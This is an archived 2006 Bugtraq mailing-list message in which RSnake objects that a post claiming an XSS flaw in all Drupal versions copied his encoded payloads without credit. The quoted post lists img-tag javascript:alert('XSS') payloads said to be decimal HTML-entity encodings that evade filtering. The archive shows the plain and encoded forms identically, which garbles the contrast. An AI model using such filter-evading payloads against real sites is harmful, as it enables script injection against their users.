[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.61.0601031237170.12498@fingers.shocking.com>
Date: Tue, 3 Jan 2006 12:38:59 -0800 (PST)
From: RSnake <rsnake@...cking.com>
To: liz0@...mail.com
Cc: bugtraq@...urityfocus.com
Subject: Re: Drupal all versiyon xss cehennem.org
Hi, it would be nice if you could give me some props next time,
as this code is pulled straight from my site. I don't mind if you
re-use it, but just plain ripping code from my site isn't super cool.
On Mon, 2 Jan 2006 liz0@...mail.com wrote:
> Drupal all versiyon xss
> ----------------------------------------------------
> site:http://www.drupal.org
>
> Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
> --------------------------------------------------
>
> img tag : on
>
> ---------------------------------------------------------------------------------------------------------------------------------------------------------------------
>
> Decimal Value: HTML (without semicolons)
>
> <img src=javascript:alert('XSS')> = <img src=javascript:alert('XSS')>
> ---------------------------------------------------------------------------------------------------------------------------------------------------------------
> Decimal Value: HTML (with semicolons)
>
> <img src=javascript:alert('XSS')> = <img src=javascript:alert('XSS')>
>
>
> ---------------------------------------------------------------------------------------------------------------------------------------------------------------
> example:
> post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')> Vulnerable
>
> post mesage :<img src=javascript:alert('XSS')> not Vulnerable but <img src=javascript:alert('XSS')> Vulnerable
>
>
> ---------------------------------------------------------
>
> Credit:Liz0ziM
> mail:liz0@...mail.com
> www.biyo.tk , www.cehennem.org
>
> Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friend
>
> -----------------------------------------------------------
> Source:
>
> http://liz0zim.no-ip.org/drupal.txt
>
> ------------------------------------------------------------
>
>
-R
Powered by blists - more mailing lists